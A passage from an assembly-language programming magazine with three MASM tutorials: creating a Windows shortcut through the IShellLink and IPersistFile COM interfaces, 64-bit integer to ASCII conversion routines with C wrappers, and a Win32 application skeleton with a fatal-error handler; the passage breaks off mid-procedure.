3 - A file path and name where the shortcut should be stored.
The use of these interfaces is simple and straightforward. It goes like
this:
* Call CoCreateInstance CLSID_ShellLink for a IID_IShellLink interface
* Queryinterface IShellLink for an IID_IPersistFile interface.
* Call IShellLink.SetPath to specify where the shortcut target is
* Call IShellLink.SetIconLocation to specify which icon to use
* Call IPersistFile.Save to save our new shortcut .lnk file.
* Call IPersistFile.Release
* Call IShellLink.Release
The last two steps will releases our hold on these interfaces, which will
automatically lead to the dll that supplied them being unloaded.
Again, the hard part in this application was finding documentation. What
finally found broke the search open was using Visual Studio "Search in
Files"
to find "IShellLink" and " IPersistFile" in the /include area of MSVC. This
lead me to various .h files, from which I hand translated the interfaces
from C
to MASM.
Another handy tool I could have used is the command line app
"FindGUID.exe,"
which looks through the registry for a specific interface name or coclass,
or
will output a list of every class and interface with their associated GUIDs.
Finally, the OLEView.exe application will let you browse the registry type
libraries and mine them for information. However, these tools come with MSVC
and are proprietary.
Take care when defining an interface. Missing vtable methods lead to
strange
results. Essentially COM calls, on one level, amount to "perform function
(number)" calls. Leave a method out of the vtable definition and you call
the
wrong interface. The original IShellLink interface definition I used from a
inc
file I downloaded had a missing function. The calls I made generated a
"SUCEEDED" hResult, but in some cases would not properly clean the stack
(since
my push count did not match the invoked function's pop count), thus lead to
a
GPF as I exited a procedure. Keep this in mind if you ever get similar
"weird" results.
MakeLink.asm, a demonstration of COM
------------------------------------
This program does very little, as all good tutorial programs should. When
run, it creates a shortcut to itself, in the same directory. It can be
amusing
to run from file explorer and watch the shortcut appear. Then you can try
the
shortcut and watch it's creation time change.
The shell link tutorial code follows. It begins with some "hack code" to
get the full file name path of the executable, and also makes a string with
the same path that changes the file to "Shortcut To ShellLink.lnk" These
strings are passed to the shell link interface, and it is saved (or
persisted in COM-speak).
The CoCreateLink procedure used to actually perform the COM methods and
perform this link creation has been kept as general as possible, and may
have reuse possibilities in other applications.
;---------------------------------------------------------------------
; MakeLink.asm ActiveX simple client to demonstrate basic concepts
; written & (c) copyright April 5, 2000 by Ernest Murphy
;
; contact the author at ernie@...
;
; may be reused for any educational or
; non-commercial application without further license
;---------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\ole32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\ole32.lib
;---------------------------------------------------------------------
CoCreateLink PROTO :DWORD, :DWORD
;---------------------------------------------------------------------
; Interface definitions
; IUnknown Interface
IUnknown_QueryInterfaceProto typedef PROTO :DWORD, :DWORD, :DWORD
IUnknown_AddRefProto typedef PROTO :DWORD
IUnknown_ReleaseProto typedef PROTO :DWORD
IUnknown_QueryInterface typedef ptr
IUnknown_QueryInterfaceProto
IUnknown_AddRef typedef ptr IUnknown_AddRefProto
IUnknown_Release typedef ptr IUnknown_ReleaseProto
IUnknown STRUCT DWORD
; IUnknown methods
QueryInterface IUnknown_QueryInterface
?
AddRef IUnknown_AddRef
?
Release IUnknown_Release
?
IUnknown ENDS
; IShellLink Interface
IShellLink_IShellLink_GetPathProto typedef PROTO :DWORD, :DWORD, :DWORD,
:DWORD, :DWORD
IShellLink_GetIDListProto typedef PROTO :DWORD, :DWORD
IShellLink_SetIDListProto typedef PROTO :DWORD, :DWORD
IShellLink_GetDescriptionProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetDescriptionProto typedef PROTO :DWORD, :DWORD
IShellLink_GetWorkingDirectoryProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetWorkingDirectoryProto typedef PROTO :DWORD, :DWORD
IShellLink_GetArgumentsProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetArgumentsProto typedef PROTO :DWORD, :DWORD
IShellLink_GetHotkeyProto typedef PROTO :DWORD, :DWORD
IShellLink_SetHotkeyProto typedef PROTO :DWORD, :WORD
IShellLink_GetShowCmdProto typedef PROTO :DWORD, :DWORD
IShellLink_SetShowCmdProto typedef PROTO :DWORD, :DWORD
IShellLink_GetIconLocationProto typedef PROTO :DWORD, :DWORD, :DWORD,
:DWORD
IShellLink_SetIconLocationProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetRelativePathProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_ResolveProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetPathProto typedef PROTO :DWORD, :DWORD
IShellLink_GetPath typedef ptr
IShellLink_IShellLink_GetPathProto
IShellLink_GetIDList typedef ptr IShellLink_GetIDListProto
IShellLink_SetIDList typedef ptr IShellLink_SetIDListProto
IShellLink_GetDescription typedef ptr IShellLink_GetDescriptionProto
IShellLink_SetDescription typedef ptr IShellLink_SetDescriptionProto
IShellLink_GetWorkingDirectory typedef ptr
IShellLink_GetWorkingDirectoryProto
IShellLink_SetWorkingDirectory typedef ptr
IShellLink_SetWorkingDirectoryProto
IShellLink_GetArguments typedef ptr IShellLink_GetArgumentsProto
IShellLink_SetArguments typedef ptr IShellLink_SetArgumentsProto
IShellLink_GetHotkey typedef ptr IShellLink_GetHotkeyProto
IShellLink_SetHotkey typedef ptr IShellLink_SetHotkeyProto
IShellLink_GetShowCmd typedef ptr IShellLink_GetShowCmdProto
IShellLink_SetShowCmd typedef ptr IShellLink_SetShowCmdProto
IShellLink_GetIconLocation typedef ptr IShellLink_GetIconLocationProto
IShellLink_SetIconLocation typedef ptr IShellLink_SetIconLocationProto
IShellLink_SetRelativePath typedef ptr IShellLink_SetRelativePathProto
IShellLink_Resolve typedef ptr IShellLink_ResolveProto
IShellLink_SetPath typedef ptr IShellLink_SetPathProto
IShellLink STRUCT DWORD
QueryInterface IUnknown_QueryInterface
?
AddRef IUnknown_AddRef
?
Release IUnknown_Release
?
GetPath IShellLink_GetPath
?
GetIDList IShellLink_GetIDList
?
SetIDList IShellLink_SetIDList
?
GetDescription IShellLink_GetDescription
?
SetDescription IShellLink_SetDescription
?
GetWorkingDirectory IShellLink_GetWorkingDirectory
?
SetWorkingDirectory IShellLink_SetWorkingDirectory
?
GetArguments IShellLink_GetArguments
?
SetArguments IShellLink_SetArguments
?
GetHotkey IShellLink_GetHotkey
?
SetHotkey IShellLink_SetHotkey
?
GetShowCmd IShellLink_GetShowCmd
?
SetShowCmd IShellLink_SetShowCmd
?
GetIconLocation IShellLink_GetIconLocation
?
SetIconLocation IShellLink_SetIconLocation
?
SetRelativePath IShellLink_SetRelativePath
?
Resolve IShellLink_Resolve
?
SetPath IShellLink_SetPath
?
IShellLink ENDS
; IPersistFile Interface
IPersistFile_GetClassIDProto typedef PROTO :DWORD, :DWORD
IPersistFile_IsDirtyProto typedef PROTO :DWORD
IPersistFile_LoadProto typedef PROTO :DWORD, :DWORD, :DWORD
IPersistFile_SaveProto typedef PROTO :DWORD, :DWORD, :DWORD
IPersistFile_SaveCompletedProto typedef PROTO :DWORD, :DWORD
IPersistFile_GetCurFileProto typedef PROTO :DWORD, :DWORD
IPersistFile_GetClassID typedef ptr IPersistFile_GetClassIDProto
IPersistFile_IsDirty typedef ptr IPersistFile_IsDirtyProto
IPersistFile_Load typedef ptr IPersistFile_LoadProto
IPersistFile_Save typedef ptr IPersistFile_SaveProto
IPersistFile_SaveCompleted typedef ptr
IPersistFile_SaveCompletedProto
IPersistFile_GetCurFile typedef ptr IPersistFile_GetCurFileProto
IPersistFile STRUCT DWORD
QueryInterface IUnknown_QueryInterface ?
AddRef IUnknown_AddRef ?
Release IUnknown_Release ?
GetClassID IPersistFile_GetClassID ?
IsDirty IPersistFile_IsDirty ?
Load IPersistFile_Load ?
Save IPersistFile_Save ?
SaveCompleted IPersistFile_SaveCompleted ?
GetCurFile IPersistFile_GetCurFile ?
IPersistFile ENDS
;---------------------------------------------------------------------
coinvoke MACRO pInterface:REQ, Interface:REQ, Function:REQ, args:VARARG
LOCAL istatement, arg
;; invokes an arbitrary COM interface
;; pInterface pointer to a specific interface instance
;; Interface the Interface's struct typedef
;; Function which function or method of the interface to perform
;; args all required arguments
;; (type, kind and count determined by the function)
istatement TEXTEQU <invoke (Interface PTR[eax]).&Function, pInterface>
FOR arg, <args>
; build the list of parameter arguments
istatement CATSTR istatement, <, >, <&arg>
ENDM
mov eax, pInterface
mov eax, [eax]
istatement
ENDM
; equate primitives
SUCEEDED TEXTEQU <!!SIGN?>
FAILED TEXTEQU <!!SUCEEDED>
MakeMessage MACRO Text:REQ
; macro to display a message box
; the text to display is kept local to
; this routine for ease of use
LOCAL lbl
LOCAL sztext
jmp lbl
sztext:
db Text,0
lbl:
invoke MessageBox,NULL,sztext,ADDR szAppName,MB_OK
ENDM
;---------------------------------------------------------------------
.data
szAppName BYTE "Shell Link Maker", 0
szLinkName BYTE "Shortcut to MakeLink.lnk", 0
szBKSlash BYTE "\", 0
hInstance HINSTANCE ?
Pos DWORD ?
szBuffer1 BYTE MAX_PATH DUP(?)
szBuffer2 BYTE MAX_PATH DUP(?)
;-----------------------------------------------------------------------
.code
start:
;---------------------------------------------
; this bracketed code is just a 'quick hack'
; to replace the filename from the filepathname
; with the 'Shortcut to' title
;
invoke GetModuleHandle, NULL
mov hInstance, eax
invoke GetModuleFileName, NULL, ADDR szBuffer1, MAX_PATH
invoke lstrcpy, ADDR szBuffer2, ADDR szBuffer1
; Find the last backslash '\' and change it to zero
mov edx, OFFSET szBuffer2
mov ecx, edx
.REPEAT
mov al, BYTE PTR [edx]
.IF al == 92 ; "\"
mov ecx, edx
.ENDIF
inc edx
.UNTIL al == 0
mov BYTE PTR [ecx+1], 0
invoke lstrcpy, ADDR szBuffer2, ADDR szLinkName
;----------------------------------------------
; here is where we call the proc with the COM methods
invoke CoInitialize, NULL
MakeMessage "Let's try our Createlink."
invoke CoCreateLink, ADDR szBuffer1, ADDR szBuffer2
MakeMessage "That's all folks !!!"
invoke CoUninitialize
invoke ExitProcess, NULL
;-----------------------------------------------------------------------
CoCreateLink PROC pszPathObj:DWORD, pszPathLink:DWORD
; CreateLink - uses the shell's IShellLink and IPersistFile interfaces
; to create and store a shortcut to the specified object.
; Returns the hresult of calling the member functions of the interfaces.
; pszPathObj - address of a buffer containing the path of the object.
; pszPathLink - address of a buffer containing the path where the
; shell link is to be stored.
; adapted from MSDN article "Shell Links"
; deleted useless "description" method
; added set icon location method
LOCAL pwsz :DWORD
LOCAL psl :DWORD
LOCAL ppsl :DWORD
LOCAL ppf :DWORD
LOCAL pppf :DWORD
LOCAL hResult :DWORD
LOCAL hHeap :DWORD
.data
CLSID_ShellLink GUID <0021401H, 0000H, 0000H, \
<0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>
IID_IShellLink GUID <00214EEH, 0000H, 0000H, \
<0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>
IID_IPersistFile GUID <000010BH, 0000H, 0000H, \
<0C0H, 00H, 00H, 00H, 00H, 00H, 00H, 046H>>
.code
; first, get some heap for a wide buffer
invoke GetProcessHeap
mov hHeap, eax
invoke HeapAlloc, hHeap, NULL, MAX_PATH * 2
mov pwsz, eax
; and set up some local pointers (we can't use ADDR on local vars)
lea eax, psl
mov ppsl, eax
lea eax, ppf
mov pppf, eax
; Get a pointer to the IShellLink interface.
invoke CoCreateInstance, ADDR CLSID_ShellLink, NULL,
CLSCTX_INPROC_SERVER,
ADDR IID_IShellLink, ppsl
mov hResult, eax
test eax, eax
.IF SUCEEDED
; Query IShellLink for the IPersistFile
; interface for saving the shortcut
coinvoke psl, IShellLink, QueryInterface, ADDR IID_IPersistFile,
pppf
mov hResult, eax
test eax, eax
.IF SUCEEDED
; Set the path to the shortcut target
coinvoke psl, IShellLink, SetPath, pszPathObj
mov hResult, eax
; add the description.
coinvoke psl, IShellLink, SetIconLocation, pszPathObj, 0
; use first icon found
mov hResult, eax
; change string to Unicode. (COM typically expects Unicode
strings)
invoke MultiByteToWideChar, CP_ACP, 0, pszPathLink, -1, pwsz,
MAX_PATH
; Save the link by calling IPersistFile::Save
coinvoke ppf, IPersistFile, Save, pwsz, TRUE
mov eax, hResult
; release the IPersistFile ppf pointer
coinvoke ppf, IPersistFile, Release
mov hResult, eax
.ENDIF
; release the IShellLink psl pointer
coinvoke psl, IShellLink, Release
mov hResult, eax
.ENDIF
; free our heap space
invoke HeapFree, hHeap, NULL, pwsz
mov eax, hResult ; since we reuse this variable over and over,
; it contains the last operations result
ret
CoCreateLink ENDP
;-----------------------------------------------------------
end start
;-----------------------------------------------------------------------
Bibliography:
-------------
"Inside COM, Microsoft's Component Object Model" Dale Rogerson
Copyright 1997, Paperback - 376 pages CD-ROM edition
Microsoft Press; ISBN: 1572313498
(THE fundamental book on understanding how COM works on a fundamental level.
Uses C++ code to illustrate basic concepts as it builds simple fully
functional COM object)
"Automation Programmer's Reference : Using ActiveX Technology to Create
Programmable Applications" (no author listed)
Copyright 1997, Paperback - 450 pages
Microsoft Press; ISBN: 1572315849
(This book has been available online on MSDN in the past, but it is cheap
enough for those of you who prefer real books you can hold in your hand.
Defines the practical interfaces and functions that the automation libraries
provide you, but is more of a reference book then a "user's guide")
Microsoft Developers Network
http://msdn.microsoft.com
"Professional Visual C++ 5 ActiveX/Com Control Programming" Sing Li
and Panos Economopoulos
Copyright April 1997, Paperback - 500 pages (no CD, files available
online)
Wrox Press Inc; ISBN: 1861000375
(Excellent description of activeX control and control site interfaces.
A recent review of this book on Amazon.com stated "These guys are the
type that want to rewrite the world's entire software base in
assembler." Need I say more?)
"sean's inconsequential homepage"
http://www.eburg.com/~baxters/
Various hardcore articles on low-level COM and ATL techniques. Coded in C++
"Using COM in Assembly Language" Bill Tyler
Assembly Language Journal, Apr-June 99
Mr Tyler keeps a web site at:
http://thunder.prohosting.com/~asm1/
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
64-bit Integer/ASCII
Conversion
by X-Calibre
The following routines provide an assembly-language library for converting
64-bit integers to and from ASCII, such as would be required when preparing
user-supplied data for qword arithmetic or FPU instructions. The library
consists of the routines ParseRadixSigned, ParseRadixUnsigned,
PrintRadixSigned, and PrintRadixUnsigned, and the macro Divide64. Wrappers
for
calling the routines from C code have also been provided.
ParseRadix
----------
ParseRadix is a pair of routines for converting an ASCII string to a signed
or
unsigned 64-bit integer, using a given radix as a base. The routines take a
pointer to a string and an integer radix as input, and return a 64-bit
number.
;-------------------------------------------------------------------------
ParseRadixUnsigned PROC
; Input: Pointer to zero-terminated string in ESI, radix in EDI
; Output: Parsed number in EDX::EAX
; Uses: EAX, EBX, ECX, EDX, ESI, EDI
xor ebx, ebx
; result in EDX::EAX
xor eax, eax
xor edx, edx
mov al, [esi]
inc esi
test eax, eax
jz @@endOfParsing
sub eax, 30h
.IF eax > 9
sub eax, 7
.ENDIF
mov bl, [esi]
@@smallParseLoop:
; ASCII to number conversion
sub ebx, 30h
inc esi
mul edi
.IF ebx > 9
sub ebx, 7
.ENDIF
add eax, ebx
mov bl, [esi]
jc @@carry
test ebx, ebx
jnz @@smallParseLoop
ret
@@carry:
inc edx
test ebx, ebx
jz @@endOfParsing
@@bigParseLoop:
; ASCII to number conversion
mov ecx, eax
mov eax, edx
sub ebx, 30h
inc esi
mul edi
xchg eax, ecx
mul edi
.IF ebx > 9
sub ebx, 7
.ENDIF
add eax, ebx
mov bl, [esi]
adc edx, ecx
test ebx, ebx
jnz @@bigParseLoop
@@endOfParsing:
ret
ParseRadixUnsigned ENDP
ParseRadixSigned PROC
; Input: Pointer to zero-terminated string in ESI, radix in EDI
; Output: Parsed number in EDX::EAX
; Uses: EAX, EBX, ECX, EDX, ESI, EDI
.code
; If string does not start with a '-', consider it positive
cmp byte ptr [esi], '-'
jne ParseRadixUnsigned
; Number is negative, first parse the absolute value
inc esi
call ParseRadixUnsigned
; Now negate the absolute value to get the negative result
neg edx
neg eax
sbb edx, 0
ret
ParseRadixSigned ENDP
;-------------------------------------------------------------------------
The following is a wrapper used for calling the ParseRadix routines from C.
The wrapper provides the following C functions:
extern unsigned __int64 __stdcall
ParseRadixUnsignedC(char *lpBuffer, unsigned int radix);
extern signed __int64 __stdcall
ParseRadixSignedC(char *lpBuffer, unsigned int radix);
;-------------------------------------------------------------------------
.386
.Model Flat, StdCall
.code
include ParseRadix.asm
ParseRadixUnsignedC PROC lpBuffer:PTR BYTE, radix:DWORD
push esi
mov esi, [lpBuffer]
push edi
mov edi, [radix]
push ebx
call ParseRadixUnsigned
pop ebx
pop edi
pop esi
ret
ParseRadixUnsignedC ENDP
ParseRadixSignedC PROC lpBuffer:PTR BYTE, radix:DWORD
push esi
mov esi, [lpBuffer]
push edi
mov edi, [radix]
push ebx
call ParseRadixSigned
pop ebx
pop edi
pop esi
ret
ParseRadixSignedC ENDP
END
;-------------------------------------------------------------------------
Divide64
--------
Divide64 is a macro for doing 64-bit division using 32-bit integer
instructions.
Note that this is a 'long division' algorithm. It can easily be expanded to
be able to divide any number by 32 bits. I only use it for 64 bits here to
keep the CPU from getting an exception on overflow when the input is larger
than ((2^32)-1)*divisor, so that printing any 64 bit number with any radix
is possible.
;-------------------------------------------------------------------------
Divide64 MACRO
; Input: 64 bit dividend in EBX::ECX, 32 bit divisor in ESI
; Output: 64 bit result in EBX::EAX, 32 bit remainder in EDX
; Uses: EAX, EBX, ECX, EDX, ESI
; Divide high dword by divisor.
mov eax, ebx
xor edx, edx
div esi
; Put remainder as high dword of the original dividend.
mov ebx, eax
mov eax, ecx
div esi
ENDM
;-------------------------------------------------------------------------
PrintRadix
----------
PrintRadix is a pair of routines for converting signed and unsigned 64-bit
numbers to an ASCII, string, using a given radix as base. These routines
take a
64-bit number and an integer radix as inpit, and return the pointer to a
character buffer.
;-------------------------------------------------------------------------
PrintRadixUnsigned PROC
; Input: 64 bit unsigned number in EBX::ECX, radix in ESI, pointer to
output
; buffer in EDI
; Output: Zero-terminated ASCII string in output buffer, length of string in
; EAX
; Uses: EAX, EBX, ECX, EDX, ESI, EDI, EBP
xor ebp, ebp ; StringLength counter
; If the high dword of the number is larger than the divisor, we
; have to do a 'long division' to prevent overflow.
cmp ebx, esi
jb smallDiv
longDiv:
Divide64
; Convert the remainder to an ASCII char.
add edx, 30h
dec esp
.IF edx > 39h
add edx, 7
.ENDIF
; Store char on stack.
inc ebp
; While result is not 0, we loop.
test eax, eax
mov ecx, eax
mov [esp], dl
jz lowDWORDIsZero
cmp ebx, esi
jae longDiv
smallDiv:
; Set EBX::ECX to EDX::EAX for a normal 64->32 division.
mov edx, ebx
mov eax, ecx
radixLoopSmall:
div esi
; Convert the remainder to an ASCII char.
add edx, 30h
dec esp
.IF edx > 39h
add edx, 7
.ENDIF
; Store char on stack.
inc ebp
mov [esp], dl
; Clean out high dword for next division.
xor edx, edx
; While result is not 0, we loop.
test eax, eax
jnz radixLoopSmall
toBuffer:
mov eax, ebp ; Return stringlength (not including 0-terminator)
toBufferLoop:
; Copy the string from stack to the destination buffer.
inc edi
mov dl, [esp]
inc esp
dec ebp
mov [edi-1], dl
jnz toBufferLoop
; Zero terminate the string.
mov byte ptr [edi], 0
ret
lowDWORDIsZero:
test ebx, ebx
jnz longDiv
; We have the final string, time to copy it to the destination buffer.
jmp toBuffer
PrintRadixUnsigned ENDP
PrintRadixSigned PROC
; Input: 64 bit signed number in EBX::ECX, radix in ESI, pointer to output
; buffer in EDI
; Output: Zero-terminated ASCII string in output buffer, length of string in
; EAX
; Uses: EAX, EBX, ECX, EDX, ESI, EDI, EBP
; If number is non-negative, use the normal PrintRadix
test ebx, ebx
jns PrintRadixUnsigned
; Prefix the number with a - sign
mov byte ptr [edi], '-'
inc edi
; Negate the 64 bit number
neg ebx
neg ecx
sbb ebx, 0
; Do a normal PrintRadix
call PrintRadixUnsigned
inc eax
ret
PrintRadixSigned ENDP
;-------------------------------------------------------------------------
The following is a wrapper used for calling the PrintRadix routines from C.
The wrapper provides the following C functions:
extern unsigned int __stdcall
PrintRadixUnsignedC(char *lpBuffer, unsigned __int64 number,
unsigned int radix);
extern unsigned int __stdcall
PrintRadixSignedC(char *lpBuffer, signed __int64 number,
unsigned int radix);
;-------------------------------------------------------------------------
.386
.Model Flat, StdCall
.code
include PrintRadix.asm
PrintRadixUnsignedC PROC lpBuffer:PTR BYTE, number:QWORD, radix:DWORD
push ebp
mov ecx, dword ptr [number]
push ebx
mov ebx, dword ptr [number+sizeof DWORD]
push esi
mov esi, [radix]
push edi
mov edi, [lpBuffer]
call PrintRadixUnsigned
pop edi
pop esi
pop ebx
pop ebp
ret
PrintRadixUnsignedC ENDP
PrintRadixSignedC PROC lpBuffer:PTR BYTE, number:QWORD, radix:DWORD
push ebp
mov ecx, dword ptr [number]
push ebx
mov ebx, dword ptr [number+sizeof DWORD]
push esi
mov esi, [radix]
push edi
mov edi, [lpBuffer]
call PrintRadixSigned
pop edi
pop esi
pop ebx
pop ebp
ret
PrintRadixSignedC ENDP
END
;-------------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Win32 AppFatalExit
Skeleton
by Chili
This is just a Win32 application skeleton with a small procedure that
manages
fatal errors, by displaying an information message box and terminating
the
process.
I think the code is pretty much self explanatory and I commented it to
some
degree, so there's not much to say. To close the black window just hit
ESCAPE.
The only one thing that isn't that quite right is the fact that you have
to
code the line numbers by hand and so if you change anything above
previously
coded numbers, you'll have to do them again... oh well!
To assemble get the MASM32 package from: http://www.pbq.com.au/home/hutch/
--8<---------------------------------------------------------------------------
; SKELETON.ASM
; Win32 AppFatalExit Skeleton
; by Chili for APJ #8
; August 11, 2000
;##############################################################################
; Compiler Options
;##############################################################################
title Win32 AppFatalExit Skeleton
.386
.model flat, stdcall ; 32-bit memory model
option casemap :none ; case sensitive
;##############################################################################
; Includes
;##############################################################################
;// Include Files
include \masm32\include\windows.inc
include \masm32\include\gdi32.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\comctl32.inc
include \masm32\include\comdlg32.inc
include \masm32\include\shell32.inc
;// Libraries
includelib \masm32\lib\gdi32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\comctl32.lib
includelib \masm32\lib\comdlg32.lib
includelib \masm32\lib\shell32.lib
;##############################################################################
; Equates
;##############################################################################
;// Basic
NULL equ 0
FALSE equ 0
TRUE equ 1
;##############################################################################
; Local Prototypes
;##############################################################################
;// Main Program Procedures.
WinMain PROTO :DWORD, :DWORD, :DWORD, :DWORD
WndProc PROTO :DWORD, :DWORD, :DWORD, :DWORD
AppFatalExit PROTO :DWORD, :DWORD
;##############################################################################
; Local Macros
;##############################################################################
;// Return a value in EAX.
return MACRO arg
IFNB <arg>
mov eax, arg
ENDIF
ret
ENDM
;// Memory-to-memory MOV.
m2m MACRO m1:REQ, m2:REQ
push m2
pop m1
ENDM
;// Memory copy.
mcopy MACRO destination:REQ, source:REQ
cld
lea esi, source
lea edi, destination
mov ecx, sizeof source
rep movsb
ENDM
;// Insert zero terminated string into code section.
szText MACRO name:REQ, text:VARARG
LOCAL lbl
jmp lbl
name db text, 0
lbl:
ENDM
;// Insert zero terminated string into .data section.
dszText MACRO name:REQ, text:VARARG
.data
name db text, 0
.code
ENDM
;// Return in EBX the ASCII size of a DWORD value
dwsize MACRO value:REQ
xor ebx, ebx
mov eax, value
.if eax == 0
inc ebx
.else
mov ecx, 10
.while eax > 0
xor edx, edx
div ecx
inc ebx
.endw
.endif
ENDM
;##############################################################################
; Initialized Data Section
;##############################################################################
.data
;##############################################################################
; Uninitialized Data Section
;##############################################################################
.data?
;##############################################################################
; Constants Section
;##############################################################################
.const
;##############################################################################
; Code Section
;##############################################################################
.code
;==============================================================================
; Beginning of executable code
;==============================================================================
start proc
;// Do some base initialization for the WinMain function and upon its
;// ending, terminate process.
LOCAL hModule :DWORD
;// Get handle to current instance.
invoke GetModuleHandle, NULL
.IF eax == NULL
dszText szGetModuleHandle_157, "GetModuleHandle, ln #157"
invoke AppFatalExit, addr szGetModuleHandle_157,
sizeof szGetModuleHandle_157
.ENDIF
mov hModule, eax
;// Get pointer to the command-line string for the current process.
invoke GetCommandLine
;// Call initial entry point for a Win32-based application.
invoke WinMain, hModule, NULL, eax, SW_SHOWMAXIMIZED
;// End process and all its threads.
invoke ExitProcess, eax
start endp
;==============================================================================
; WinMain Function (Called by the system as the initial entry point for a
; Win32-based application)
;==============================================================================
WinMain proc hInstance :DWORD, ;// handle to current instance
hPrevInstance :DWORD, ;// handle to previous instance
lpCmdLine :DWORD, ;// pointer to command line
nCmdShow :DWORD ;// show state of window
;// Perform initialization, create and display a main window and enter a
;// message retrieval-and-dispatch loop.
LOCAL wc :WNDCLASSEX
LOCAL hwndMain :DWORD
LOCAL msg :MSG
;// Register the window class for the main window.
mov wc.cbSize, sizeof WNDCLASSEX
mov wc.style, CS_OWNDC
mov wc.lpfnWndProc, offset MainWndProc
mov wc.cbClsExtra, 0
mov wc.cbWndExtra, 0
m2m wc.hInstance, hInstance
invoke LoadIcon, NULL, IDI_APPLICATION
.if eax == NULL
dszText szLoadIcon_203, "LoadIcon, ln #203"
invoke AppFatalExit, addr szLoadIcon_203, sizeof szLoadIcon_203
.endif
mov wc.hIcon, eax
invoke LoadCursor, NULL, IDC_ARROW
.if eax == NULL
dszText szLoadCursor_209, "LoadCursor, ln #209"
invoke AppFatalExit, addr szLoadCursor_209, sizeof szLoadCursor_209
.endif
mov wc.hCursor, eax
invoke GetStockObject, BLACK_BRUSH
.if eax == NULL
dszText szGetStockObject_215, "GetStockObject, ln #215"
invoke AppFatalExit, addr szGetStockObject_215,
sizeof szGetStockObject_215
.endif
mov wc.hbrBackground, eax
mov wc.lpszMenuName, NULL
dszText szClassName, "MainWndClass"
mov wc.lpszClassName, offset szClassName
mov wc.hIconSm, NULL
invoke RegisterClassEx, addr wc
.if eax == 0
dszText szRegisterClassEx_227, "RegisterClassEx, ln #227"
invoke AppFatalExit, addr szRegisterClassEx_227,
sizeof szRegisterClassEx_227
.endif
;// Create the main window.
dszText szDisplayName, "Win32 AppFatalExit Skeleton"
invoke CreateWindowEx, NULL, addr szClassName, addr szDisplayName,
WS_POPUP or WS_CLIPSIBLINGS or WS_MAXIMIZE or \
WS_CLIPCHILDREN, CW_USEDEFAULT, CW_USEDEFAULT,
CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL,
hInstance, NULL
;// If the main window cannot be created, terminate the application.
.if eax == NULL
dszText szCreateWindowEx_237, "CreateWindowEx, ln #237"
invoke AppFatalExit, addr szCreateWindowEx_237,
sizeof szCreateWindowEx_237
.endif
mov hwndMain, eax
;// Show the window and paint its contents.
invoke ShowWindow, hwndMain, nCmdShow
invoke UpdateWindow, hwndMain
.if eax == NULL
dszText szUpdateWindow_255, "UpdateWindow, ln #255"
invoke AppFatalExit, addr szUpdateWindow_255,
sizeof szUpdateWindow_255
.endif
;// Start the message loop.
.while TRUE
invoke PeekMessage, addr msg, NULL, 0, 0, PM_REMOVE
.if (eax != 0)
.break .if msg.message == WM_QUIT
invoke TranslateMessage, addr msg
invoke DispatchMessage, addr msg
.endif
.endw
;// Return the exit code to Windows.
return msg.wParam
WinMain endp
;==============================================================================
; WindowProc Function (Application-defined callback function that processes
; messages sent to a window)
;==============================================================================
MainWndProc proc hwnd :DWORD, ;// handle of window
uMsg :DWORD, ;// message identifier
wParam :DWORD, ;// first message parameter
lParam :DWORD ;// second message paramater
;// Dispatch the messages that can be received.
.if uMsg == WM_KEYDOWN
;// Process keyboard input by means of a key press.
.if wParam == VK_ESCAPE
;// Clean up window-specific data objects.
invoke PostQuitMessage, NULL
return 0
.endif
.elseif uMsg == WM_DESTROY
;// Clean up window-specific data objects.
invoke PostQuitMessage, NULL
return 0
.endif
;// Process other messages.
invoke DefWindowProc, hwnd, uMsg, wParam, lParam
ret
MainWndProc endp
;==============================================================================
; Application Fatal Exit Procedure
;==============================================================================
AppFatalExit proc lpszCaption :DWORD, ;// pointer to string to display
in
\ ;// caption of the message box
nSize :DWORD ;// size of caption
;// Display a message box and terminate.
LOCAL uExitCode :DWORD
LOCAL lpBuffer :DWORD
LOCAL szFatalMessage [256]:BYTE
LOCAL nSizeMsg :DWORD
LOCAL szFatalCaption [64]:BYTE
;// Get the calling thread's last-error code value.
invoke GetLastError
mov uExitCode, eax
;// Obtain error message string.
invoke FormatMessage, FORMAT_MESSAGE_ALLOCATE_BUFFER or \
FORMAT_MESSAGE_FROM_SYSTEM, NULL, uExitCode, 0,
addr lpBuffer, 0, NULL
.if eax == NULL
dwsize uExitCode
mov nSizeMsg, ebx
invoke GetLastError
push eax
dwsize eax
add nSizeMsg, ebx
pop eax
dszText szDoubleFmt, "#%lu [& #%lu]"
invoke wsprintf, addr szFatalMessage, addr szDoubleFmt, uExitCode,
eax
add nSizeMsg, 7
.if eax != nSizeMsg
dszText szDoubleMessage, "#??? [& #???]"
mcopy szFatalMessage, szDoubleMessage
.endif
.else
mov nSizeMsg, eax
dwsize uExitCode
add nSizeMsg, ebx
dszText szFmt, "#%lu - %s"
invoke wsprintf, addr szFatalMessage, addr szFmt, uExitCode,
lpBuffer
add nSizeMsg, 4
.if eax != nSizeMsg
dszText szMessage, "#??? - ?????"
mcopy szFatalMessage, szMessage
.endif
invoke LocalFree, lpBuffer ;// Possible errors in LocalFree ignored
.endif
;// Display the application fatal exit message box.
dszText szCaptionFmt, "Fatal: %s"
invoke wsprintf, addr szFatalCaption, addr szCaptionFmt, lpszCaption
add nSize, 6
.if eax != nSize
dszText szCaption, "Fatal: ?????, ln #???"
